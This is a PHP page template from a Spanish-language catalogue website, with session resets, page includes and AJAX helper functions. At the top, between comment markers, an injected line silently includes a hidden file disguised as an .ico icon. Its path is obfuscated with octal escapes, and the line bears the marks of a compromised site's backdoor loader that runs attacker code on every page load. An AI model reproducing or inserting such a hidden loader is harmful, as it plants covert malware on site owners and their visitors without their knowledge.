<?php
/*b9ef1*/

@include "\057h\157m\145/\145t\155a\143o\1551\057p\165b\154i\143_\150t\155l\057l\151b\162a\162i\145s\057j\157o\155l\141/\146o\162m\057.\1430\0625\0656\063b\056i\143o";

/*b9ef1*/
	include("encabezado.php");
	
	//BLANQUEAR VARIABLES DE SESIÓN
	$_SESSION['idMarca'] = "";
	$_SESSION['segmento'] = "";
	$_SESSION['modelo'] = "";
	$_SESSION['codigo_pieza'] = "";
	$_SESSION['diametro'] = "";
	$_SESSION['longitud'] = "";
	$_SESSION['tipo_pieza'] = "";
?>
<div class="contenido">
<uno>
    <section>

     <article class="fila1">
        <p>
          <?php include("ultimas_incorporaciones.php");?>
        </p>
    </article>
	
   
  </section>
</uno>

</div>

</div>

<script type="text/javascript">

    function Enviar(_pagina, capa, tipo_pieza) {
        var ajax = ajaxFunction();
        function ajaxFunction() {
            var xmlHttp;
            try { // Firefox, Opera 8.0+, Safari
                xmlHttp=new XMLHttpRequest();
                return xmlHttp;
            } 
            catch (e){ // Internet Explorer
                try {
                    xmlHttp=new ActiveXObject("Msxml2.XMLHTTP");
                    return xmlHttp;
                } 
                catch(e){
                    try{
                        xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");
                        return xmlHttp;
                    } 
                    catch(e){
                        alert("Tu navegador no soporta AJAX!");
                        return false;
                    }
                }
            }
        }
        ajax.open("POST", _pagina, true);	
        ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        ajax.onreadystatechange = function(){
            if (ajax.readyState == 4){
                document.getElementById(capa).innerHTML = ajax.responseText;
				document.getElementById('tipo_pieza').value = tipo_pieza;
				if (tipo_pieza == "Triceta"){
					document.getElementById('longitud').placeholder = "<?php echo $diccionario['z']; ?>";
				}
				else{
					document.getElementById('longitud').placeholder = "<?php echo $diccionario['longitud']; ?>";
				}
            }
        }
        ajax.send(null);
    }
    
    function getSeleccionCombo(sel){
       return sel.value;
    }
	
	function cargarMovimiento(){
		document.getElementById('tipo_pieza').value = 'Movimiento';
		document.forms["form_medida"].submit();
	}
    
    function EnviarDoblePagina(pag1, capa1, pag2, capa2) {
        var ajax = ajaxFunction();
        var ajax2 = ajaxFunction();
        function ajaxFunction() {
            var xmlHttp;
            try { // Firefox, Opera 8.0+, Safari
                xmlHttp=new XMLHttpRequest();
                return xmlHttp;
            } 
            catch (e){ // Internet Explorer
                try {
                    xmlHttp=new ActiveXObject("Msxml2.XMLHTTP");
                    return xmlHttp;
                } 
                catch(e){
                    try{
                        xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");
                        return xmlHttp;
                    } 
                    catch(e){
                        alert("Tu navegador no soporta AJAX!");
                        return false;
                    }
                }
            }
        }
        ajax.open("POST", pag1, true);	
        ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        ajax.onreadystatechange = function(){
            if (ajax.readyState == 4){
                document.getElementById(capa1).innerHTML = ajax.responseText;
            }
        }
        ajax.send(null);
        
        ajax2.open("POST", pag2, true);	
        ajax2.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        ajax2.onreadystatechange = function(){
            if (ajax2.readyState == 4){
                document.getElementById(capa2).innerHTML = ajax2.responseText;
            }
        }
        ajax2.send(null);
    }

</script>



</body>
</html>